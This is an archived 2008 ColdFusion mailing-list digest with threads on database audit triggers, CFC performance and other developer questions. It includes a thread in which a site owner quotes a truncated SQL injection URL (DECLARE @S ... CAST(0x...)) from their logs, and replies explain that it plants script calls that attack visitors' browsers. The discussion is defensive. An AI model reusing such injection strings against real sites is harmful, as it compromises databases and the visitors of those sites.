Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 Hello, naive question maybe, nevertheless: Can someone confirm that having applied the Microsoft patch(es) mentioned on http://www.microsoft.com/technet/security/bulletin/MS08-040.mspx is sufficient to protect against attacks like these? Who had applied the patch(es) but still was attacked and infected successfully? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309430 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
DataSource Events like Before Commit?
Dear ColdFusion Users, Is there a way that I can attach to a datasource through an event like before_commit or before_update? So, if I have a cfquery tag, and I would ColdFusion to automatically, before ColdFusion executes the code found in the cfquery I would like it to automatically execute another query for example to set the user id to the database? In this way I do not need to make any modification to the existing code except that of creating new code to do something before executing my main query? Thanks in advance for your assistance. Regards, Joseph. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309431 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: DataSource Events like Before Commit?
Joseph, I don't think what you are trying to do is possible. Can you give us some more details of what you are trying to accomplish to see if we can help you come up with an alternative solution? Sincerely, Dave Phillips -Original Message- From: Joseph Bugeja [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 4:50 AM To: CF-Talk Subject: DataSource Events like Before Commit? Dear ColdFusion Users, Is there a way that I can attach to a datasource through an event like before_commit or before_update? So, if I have a cfquery tag, and I would ColdFusion to automatically, before ColdFusion executes the code found in the cfquery I would like it to automatically execute another query for example to set the user id to the database? In this way I do not need to make any modification to the existing code except that of creating new code to do something before executing my main query? Thanks in advance for your assistance. Regards, Joseph. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309432 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: DataSource Events like Before Commit?
Well you can use database triggers on tables for this matter, if your queries are related to simple tables... Greetings from Switzerland Gert Franz Railo Technologies GmbH [EMAIL PROTECTED] www.railo.ch Join our Mailing List german:http://de.groups.yahoo.com/group/railo/ english: http://groups.yahoo.com/group/railo_talk/ linked in: http://www.linkedin.com/e/gis/71368/0CF7D323BBC1 Joseph Bugeja schrieb: Dear ColdFusion Users, Is there a way that I can attach to a datasource through an event like before_commit or before_update? So, if I have a cfquery tag, and I would ColdFusion to automatically, before ColdFusion executes the code found in the cfquery I would like it to automatically execute another query for example to set the user id to the database? In this way I do not need to make any modification to the existing code except that of creating new code to do something before executing my main query? Thanks in advance for your assistance. Regards, Joseph. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309433 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Does cfc filesize make a performance hit?
Im looking for milliseconds to shave off an app that creates XML files. it consists fo a cfc that takes a bean with LOTS of getters and setters, and makes an XML file out of it. What i have now is a cfc that has 107 methods. Each method makes a fragment of the XML file, with some conditional logic and one method stitches them all together and returns a completed XML string. My thought is that perhaps this app might run faster if instead of one CFC with 107 methods it might be better to split the cfc into 4 or 5 different cfcs, that load as required. So my question is, if there's no difference in the actual amount of processing involved, would it be likely to run faster with one big cfc or several small cfcs?Or to put it another way . is there a performance hit when instantiating large CFCs? Greater than a number of smaller CFCS? (the large one i ahve now has 3200lines and 107 methods. It seems when i load it that there might be quite a bit of parsing and syntax checking going on while it's being instantiated. yes? ) -- Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion 8 Enterprise , PHP, ASP, ASP.NET hosting from AUD$15/month ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309434 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: DataSource Events like Before Commit?
Thanks for your reply. Let me explain our scenario. We have a number of cfquery tags that insert, update and delete data from our Oracle database. Basically, before each query is run I need to execute a stored procedure. This stored procedure sets the userid (the user currently logged in) in the database for auditing purposes. We have hundreds of queries and it is not good from a design perspective to rewrite each query to call the same central piece of code before each query gets executed. So my original query should be: Original Query: cfquery DML Operation /cfquery New requirement should be: cftransaction cfstoredproc Set the user id /cfstoredproc cfquery DML Operation /cfquery /cftransaction As shown above, I need to call the cfstoredproc before each query is executed. Personally, I would prefer if I keep my original design and before the original query is run the ColdFusion engine automatically injects the new call in a transaction to set the clientid. Do you have any suggestions? Joseph, I don't think what you are trying to do is possible. Can you give us some more details of what you are trying to accomplish to see if we can help you come up with an alternative solution? Sincerely, Dave Phillips Dear ColdFusion Users, Is there a way that I can attach to a datasource through an event like before_commit or before_update? So, if I have a cfquery tag, and I would ColdFusion to automatically, before ColdFusion executes the code found in the cfquery I would like it to automatically execute another query for example to set the user id to the database? In this way I do not need to make any modification to the existing code except that of creating new code to do something before executing my main query? Thanks in advance for your assistance. Regards, Joseph. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309435 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: DataSource Events like Before Commit?
Are you using components for all your data access transactions (ie. dao, etc)? If so, and you are using ColdSpring (or some other bean factory) to manage your cfcs, this would be a perfect place for AOP. If you are not using a bean factory, you could create a lightweight aop style function / component method that looks something like: FUNCTION doDBTransaction ARG1 - userId ARG2 - daoObject ARG3 - daoMethodToRun ARG4 - daoMethodArgs BEGIN TRANSACTION DO code to store current user in db SET returnval = daoObject.daoMethodToRun(daoMethodArgs) DO whatever cleanup code you may have END TRANSACTION RETURN returnVal If you are not using components for your db transactions you could possibly do something similar; perhaps passing in the name of templates that hold the queries. HTH Dominic -- Blog it up: http://fusion.dominicwatson.co.uk ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309436 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
This attack has nothing to do with elevation of privilege. It simply tacks on a SQL procedure to a query existing on the page already. This procedure then runs through the tables/columns in the database appending text the end of content in varchar fields. The text appended varies, but what I've seen is a javascript file call, that would run when the affected content was displayed in a browser. I can't see how that security patch would have anything to do with it. (Please enlighten me if I'm wrong.) Can someone confirm that having applied the Microsoft patch(es) mentioned on http://www.microsoft.com/technet/security/bulletin/MS08-040.mspx is sufficient to protect against attacks like these? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309437 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Does cfc filesize make a performance hit?
Even if you split it out, would the processing page not still end up calling the same amount of methods unless you could redesign the build process somehow? I sometimes wonder if speed is the ultimate goal and at any cost if it might just be better to use included files with UDFs when needed over CFCs. On Tue, Jul 22, 2008 at 6:06 AM, Mike Kear [EMAIL PROTECTED] wrote: Im looking for milliseconds to shave off an app that creates XML files. it consists fo a cfc that takes a bean with LOTS of getters and setters, and makes an XML file out of it. What i have now is a cfc that has 107 methods. Each method makes a fragment of the XML file, with some conditional logic and one method stitches them all together and returns a completed XML string. My thought is that perhaps this app might run faster if instead of one CFC with 107 methods it might be better to split the cfc into 4 or 5 different cfcs, that load as required. So my question is, if there's no difference in the actual amount of processing involved, would it be likely to run faster with one big cfc or several small cfcs?Or to put it another way . is there a performance hit when instantiating large CFCs? Greater than a number of smaller CFCS? (the large one i ahve now has 3200lines and 107 methods. It seems when i load it that there might be quite a bit of parsing and syntax checking going on while it's being instantiated. yes? ) -- Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion 8 Enterprise , PHP, ASP, ASP.NET hosting from AUD$15/month ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309438 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: DataSource Events like Before Commit?
Joseph, I think Gert's suggestion earlier could work for you. You could design a trigger to fire the stored procedure prior to any Inserts or Updates. Check out this page on oracle site for some direction: http://tinyurl.com/5sjhlg I haven't done anything with triggers myself. But if you want to avoid re-coding your CFML, I think this is your route to go. Of course, this will only work for you if the only thing changing your tables is your CF app. Any manual changes to the database, or any other application accessing the same database would fire the triggers as well, unless you can figure out a way to make them fire only when your app accesses the database. Hope this helps, Dave Phillips -Original Message- From: Joseph Bugeja [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 6:51 AM To: CF-Talk Subject: Re: DataSource Events like Before Commit? Thanks for your reply. Let me explain our scenario. We have a number of cfquery tags that insert, update and delete data from our Oracle database. Basically, before each query is run I need to execute a stored procedure. This stored procedure sets the userid (the user currently logged in) in the database for auditing purposes. We have hundreds of queries and it is not good from a design perspective to rewrite each query to call the same central piece of code before each query gets executed. So my original query should be: Original Query: cfquery DML Operation /cfquery New requirement should be: cftransaction cfstoredproc Set the user id /cfstoredproc cfquery DML Operation /cfquery /cftransaction As shown above, I need to call the cfstoredproc before each query is executed. Personally, I would prefer if I keep my original design and before the original query is run the ColdFusion engine automatically injects the new call in a transaction to set the clientid. Do you have any suggestions? Joseph, I don't think what you are trying to do is possible. Can you give us some more details of what you are trying to accomplish to see if we can help you come up with an alternative solution? Sincerely, Dave Phillips Dear ColdFusion Users, Is there a way that I can attach to a datasource through an event like before_commit or before_update? So, if I have a cfquery tag, and I would ColdFusion to automatically, before ColdFusion executes the code found in the cfquery I would like it to automatically execute another query for example to set the user id to the database? In this way I do not need to make any modification to the existing code except that of creating new code to do something before executing my main query? Thanks in advance for your assistance. Regards, Joseph. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309439 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Problems with switching from application.cfm to application.c fc
Richard, You may want to check out the documentation on application.cfc before going any further... Gary ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309440 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: DataSource Events like Before Commit?
You could make them fire based upon a null value or value not being set at all. For example if UserID is in fact passed in then do not fire trigger but if UserID is not passed in then fire the trigger. I think that would then work fine for the CF pages interacting with things and then when manually interacting so long as the person doing the queries remembers the triggers are in place then they could bypass them that way. Although if someone knew they were in place they could also just disable the trigger, run whatever they needed to do and then re-enable the trigger. On Tue, Jul 22, 2008 at 7:20 AM, Experienced CF Developer [EMAIL PROTECTED] wrote: Joseph, I think Gert's suggestion earlier could work for you. You could design a trigger to fire the stored procedure prior to any Inserts or Updates. Check out this page on oracle site for some direction: http://tinyurl.com/5sjhlg I haven't done anything with triggers myself. But if you want to avoid re-coding your CFML, I think this is your route to go. Of course, this will only work for you if the only thing changing your tables is your CF app. Any manual changes to the database, or any other application accessing the same database would fire the triggers as well, unless you can figure out a way to make them fire only when your app accesses the database. Hope this helps, Dave Phillips -Original Message- From: Joseph Bugeja [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 6:51 AM To: CF-Talk Subject: Re: DataSource Events like Before Commit? Thanks for your reply. Let me explain our scenario. We have a number of cfquery tags that insert, update and delete data from our Oracle database. Basically, before each query is run I need to execute a stored procedure. This stored procedure sets the userid (the user currently logged in) in the database for auditing purposes. We have hundreds of queries and it is not good from a design perspective to rewrite each query to call the same central piece of code before each query gets executed. So my original query should be: Original Query: cfquery DML Operation /cfquery New requirement should be: cftransaction cfstoredproc Set the user id /cfstoredproc cfquery DML Operation /cfquery /cftransaction As shown above, I need to call the cfstoredproc before each query is executed. Personally, I would prefer if I keep my original design and before the original query is run the ColdFusion engine automatically injects the new call in a transaction to set the clientid. Do you have any suggestions? Joseph, I don't think what you are trying to do is possible. Can you give us some more details of what you are trying to accomplish to see if we can help you come up with an alternative solution? Sincerely, Dave Phillips Dear ColdFusion Users, Is there a way that I can attach to a datasource through an event like before_commit or before_update? So, if I have a cfquery tag, and I would ColdFusion to automatically, before ColdFusion executes the code found in the cfquery I would like it to automatically execute another query for example to set the user id to the database? In this way I do not need to make any modification to the existing code except that of creating new code to do something before executing my main query? Thanks in advance for your assistance. Regards, Joseph. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309441 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: DataSource Events like Before Commit?
Thanks again for your reply. Unfortunately, I need to pass the userid prior to executing each query as otherwise the auditing function would not know the userid. We have triggers on tables but triggers need the read the userid apriori. ColdFusion does not allow us to build our connection string dynamically or to dynamically inject connection string variables (such as the userid), as is the case with VB.NET and C#. This is why I am looking for an alternative. Joseph, I think Gert's suggestion earlier could work for you. You could design a trigger to fire the stored procedure prior to any Inserts or Updates. Check out this page on oracle site for some direction: http://tinyurl.com/5sjhlg I haven't done anything with triggers myself. But if you want to avoid re-coding your CFML, I think this is your route to go. Of course, this will only work for you if the only thing changing your tables is your CF app. Any manual changes to the database, or any other application accessing the same database would fire the triggers as well, unless you can figure out a way to make them fire only when your app accesses the database. Hope this helps, Dave Phillips Thanks for your reply. Let me explain our scenario. We have a number of cfquery tags that insert, update and delete data from our Oracle database. Basically, before each query is run I need to execute a stored procedure. This stored procedure sets the userid (the user currently logged in) in the database for auditing purposes. We have hundreds of queries and it is not good from a design perspective to rewrite each query to call the same central piece of code before each query gets executed. So my original query should be: Original Query: cfquery DML Operation /cfquery New requirement should be: cftransaction cfstoredproc Set the user id /cfstoredproc cfquery DML Operation /cfquery /cftransaction As shown above, I need to call the cfstoredproc before each query is executed. Personally, I would prefer if I keep my original design and before the original query is run the ColdFusion engine automatically injects the new call in a transaction to set the clientid. Do you have any suggestions? before ColdFusion executes the code found in the cfquery I would like it to automatically execute another query for example to set the user id to the database? In this way I do not need to make any modification to the existing code except that of creating new code to do something before executing my main query? Thanks in advance for your assistance. Regards, Joseph. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309442 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Does cfc filesize make a performance hit?
The logic has 3 or 4 major branches, so the total number of methods called is about a third or a quarter of the total. So the choice is to instantiate one 3000 line cfc with 107 methods only some fo which get used, against 2 or 3 smaller cfcs where al the methods get used. So does anyone have an feel for whether there is a performance hit from instantiating methods that never end up being used? On this machine JRun is bloating up to 500MB or more so the technique i'd normally use of putting the cfc into a shared scope isnt an option. We have to reduce things in memory as much as possible.On my test machine, I run this cfc on 250 records in quick succession and it brings the machine to its knees. Jrun bloats to the point where nothing else will run.I hate to think what would happen if i released this thing into the wild Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month On Tue, Jul 22, 2008 at 10:11 PM, Aaron Rouse [EMAIL PROTECTED] wrote: Even if you split it out, would the processing page not still end up calling the same amount of methods unless you could redesign the build process somehow? I sometimes wonder if speed is the ultimate goal and at any cost if it might just be better to use included files with UDFs when needed over CFCs. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309443 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
The purpose of the hack is to change your website, so that each visitor is hit with a series of browser exploit attempts while reading your website. Some of the exploits attempted are handled by the MS patch. Some are not. (Examples of the exploits: Ms06-014, flash, SP2, Realplayer11, Norton, pxhack) On Tue, Jul 22, 2008 at 8:11 AM, Kris Jones [EMAIL PROTECTED] wrote: This attack has nothing to do with elevation of privilege. It simply tacks on a SQL procedure to a query existing on the page already. This procedure then runs through the tables/columns in the database appending text the end of content in varchar fields. The text appended varies, but what I've seen is a javascript file call, that would run when the affected content was displayed in a browser. I can't see how that security patch would have anything to do with it. (Please enlighten me if I'm wrong.) Can someone confirm that having applied the Microsoft patch(es) mentioned on http://www.microsoft.com/technet/security/bulletin/MS08-040.mspx is sufficient to protect against attacks like these? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309444 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: DataSource Events like Before Commit?
Got it. Now I understand better. You want to pass the userid of your 'logged in user' to track the change in the database instead of using the user id that the datasource is logged in as. I don't see any way for you to do this without changing your code. Maybe someone else can come up with something, but I just don't see any way around it. Whether you change it to implement the idea you had below or do it some other way, bottom line is, you will need to change your code to make Oracle aware of each individual user's ID. You might still be able to find a way to use the triggers, but I still think you'll need a code change. Sorry, no help. Dave -Original Message- From: Joseph Bugeja [mailto:[EMAIL PROTECTED] Sent: Tuesday, July 22, 2008 7:28 AM To: CF-Talk Subject: Re: DataSource Events like Before Commit? Thanks again for your reply. Unfortunately, I need to pass the userid prior to executing each query as otherwise the auditing function would not know the userid. We have triggers on tables but triggers need the read the userid apriori. ColdFusion does not allow us to build our connection string dynamically or to dynamically inject connection string variables (such as the userid), as is the case with VB.NET and C#. This is why I am looking for an alternative. Joseph, I think Gert's suggestion earlier could work for you. You could design a trigger to fire the stored procedure prior to any Inserts or Updates. Check out this page on oracle site for some direction: http://tinyurl.com/5sjhlg I haven't done anything with triggers myself. But if you want to avoid re-coding your CFML, I think this is your route to go. Of course, this will only work for you if the only thing changing your tables is your CF app. Any manual changes to the database, or any other application accessing the same database would fire the triggers as well, unless you can figure out a way to make them fire only when your app accesses the database. Hope this helps, Dave Phillips Thanks for your reply. Let me explain our scenario. We have a number of cfquery tags that insert, update and delete data from our Oracle database. Basically, before each query is run I need to execute a stored procedure. This stored procedure sets the userid (the user currently logged in) in the database for auditing purposes. We have hundreds of queries and it is not good from a design perspective to rewrite each query to call the same central piece of code before each query gets executed. So my original query should be: Original Query: cfquery DML Operation /cfquery New requirement should be: cftransaction cfstoredproc Set the user id /cfstoredproc cfquery DML Operation /cfquery /cftransaction As shown above, I need to call the cfstoredproc before each query is executed. Personally, I would prefer if I keep my original design and before the original query is run the ColdFusion engine automatically injects the new call in a transaction to set the clientid. Do you have any suggestions? before ColdFusion executes the code found in the cfquery I would like it to automatically execute another query for example to set the user id to the database? In this way I do not need to make any modification to the existing code except that of creating new code to do something before executing my main query? Thanks in advance for your assistance. Regards, Joseph. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309445 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Does cfc filesize make a performance hit?
Are you storing the XML as a string or using a the native CF XML object? When working with large strings, I've obtained big speed increases by using a Java String Buffer object. On Tue, Jul 22, 2008 at 8:32 AM, Mike Kear [EMAIL PROTECTED] wrote: The logic has 3 or 4 major branches, so the total number of methods called is about a third or a quarter of the total. So the choice is to instantiate one 3000 line cfc with 107 methods only some fo which get used, against 2 or 3 smaller cfcs where al the methods get used. So does anyone have an feel for whether there is a performance hit from instantiating methods that never end up being used? On this machine JRun is bloating up to 500MB or more so the technique i'd normally use of putting the cfc into a shared scope isnt an option. We have to reduce things in memory as much as possible.On my test machine, I run this cfc on 250 records in quick succession and it brings the machine to its knees. Jrun bloats to the point where nothing else will run.I hate to think what would happen if i released this thing into the wild Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month On Tue, Jul 22, 2008 at 10:11 PM, Aaron Rouse [EMAIL PROTECTED] wrote: Even if you split it out, would the processing page not still end up calling the same amount of methods unless you could redesign the build process somehow? I sometimes wonder if speed is the ultimate goal and at any cost if it might just be better to use included files with UDFs when needed over CFCs. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309446 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Does cfc filesize make a performance hit?
I know when one of our guys decided to take a complex series of included files and put it into 4 CFCs to make things easier to manage that the pages actually slowed down. When he started to back track through things it appeared the added overhead was from all of the method calls he was then making. A couple years ago I inherited a process that would bring a CF server down to its knees when it would run due to what appeared being an issue with CF never releasing resources after they were used until the page itself quit running. At the time the work around and it was not a pretty one was to send the processing to another page, so that it was another page call but in order for that to work on that version of CF at least it meant calling a web service within the same application. Our internal reservation system originally had a 5000 line CFC that it used for the bulk of things. Not sure how many methods were in it, I doubt anywhere near 100 but I also know in most cases only 2-3 methods were ever used. When we split things out into 6 CFCs we saw no performance hit either way. On Tue, Jul 22, 2008 at 7:32 AM, Mike Kear [EMAIL PROTECTED] wrote: The logic has 3 or 4 major branches, so the total number of methods called is about a third or a quarter of the total. So the choice is to instantiate one 3000 line cfc with 107 methods only some fo which get used, against 2 or 3 smaller cfcs where al the methods get used. So does anyone have an feel for whether there is a performance hit from instantiating methods that never end up being used? On this machine JRun is bloating up to 500MB or more so the technique i'd normally use of putting the cfc into a shared scope isnt an option. We have to reduce things in memory as much as possible.On my test machine, I run this cfc on 250 records in quick succession and it brings the machine to its knees. Jrun bloats to the point where nothing else will run.I hate to think what would happen if i released this thing into the wild Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month On Tue, Jul 22, 2008 at 10:11 PM, Aaron Rouse [EMAIL PROTECTED] wrote: Even if you split it out, would the processing page not still end up calling the same amount of methods unless you could redesign the build process somehow? I sometimes wonder if speed is the ultimate goal and at any cost if it might just be better to use included files with UDFs when needed over CFCs. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309447 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: DataSource Events like Before Commit?
Exactly! You perfectly understood my concern. If ColdFusion supported dynamic connection parameter injection or proxy authentication then we can identify the connection pool users but there is no straightforward solution to this. Through pooling we are connected through one db user which for security complaince (PCI) we need to remove this hole while keeping the benefits of pooling. Triggers can help certainly help us for auditing but again at db level I do not want have the same user showing up in my logs. Got it. Now I understand better. You want to pass the userid of your 'logged in user' to track the change in the database instead of using the user id that the datasource is logged in as. I don't see any way for you to do this without changing your code. Maybe someone else can come up with something, but I just don't see any way around it. Whether you change it to implement the idea you had below or do it some other way, bottom line is, you will need to change your code to make Oracle aware of each individual user's ID. You might still be able to find a way to use the triggers, but I still think you'll need a code change. Sorry, no help. Dave Thanks again for your reply. Unfortunately, I need to pass the userid prior to executing each query as otherwise the auditing function would not know the userid. We have triggers on tables but triggers need the read the userid apriori. ColdFusion does not allow us to build our connection string dynamically or to dynamically inject connection string variables (such as the userid), as is the case with VB.NET and C#. This is why I am looking for an alternative. Joseph, I think Gert's suggestion earlier could work for you. You could design a trigger to fire the stored procedure prior to any Inserts or Updates. Check a before ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309448 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Mystery Character/ Adobe's Crack QC Team
http://livedocs.adobe.com/coldfusion/6/CFML_Reference/functions-pt121.html Well, thanks. That worked to get me the number of the character. It's 8226. That will help. I have to add, this is the second time I've copied a routine directly from the Adobe web site, and it's the second time it didn't work as published. Try it - it's missing the method=post statement in form and won't run as is. They must have one heck of a crack QC team over there. Robert B. Harrison Director of Interactive services Austin Williams 125 Kennedy Drive, Suite 100 Hauppauge NY 11788 T : 631.231.6600 Ext. 119 F : 631.434.7022 www.austin-williams.com Great advertising can't be either/or... It must be . ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309449 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
No, because those sites are still using the URL variables, just not visibly. andy -Original Message- From: Che Vilnonis [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 3:39 PM To: CF-Talk Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... Here's another question. Are sites that rewrite URLs (i.e., no .cfm extension in the url) more or less NOT being hit by these malbots? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309450 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Does cfc filesize make a performance hit?
Just a guess but it sounds more like the CF's infamous string manipulation memory issue than a CFC issue. This issue, and various work a-rounds, was covered in great detail on CF talk about a month or so ago. I would do a search on the cf_talk list looking for Memory issue string manipulation java etc. HTH, ~G~ On Tue, Jul 22, 2008 at 8:32 AM, Mike Kear [EMAIL PROTECTED] wrote: The logic has 3 or 4 major branches, so the total number of methods called is about a third or a quarter of the total. So the choice is to instantiate one 3000 line cfc with 107 methods only some fo which get used, against 2 or 3 smaller cfcs where al the methods get used. So does anyone have an feel for whether there is a performance hit from instantiating methods that never end up being used? On this machine JRun is bloating up to 500MB or more so the technique i'd normally use of putting the cfc into a shared scope isnt an option. We have to reduce things in memory as much as possible.On my test machine, I run this cfc on 250 records in quick succession and it brings the machine to its knees. Jrun bloats to the point where nothing else will run.I hate to think what would happen if i released this thing into the wild Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks 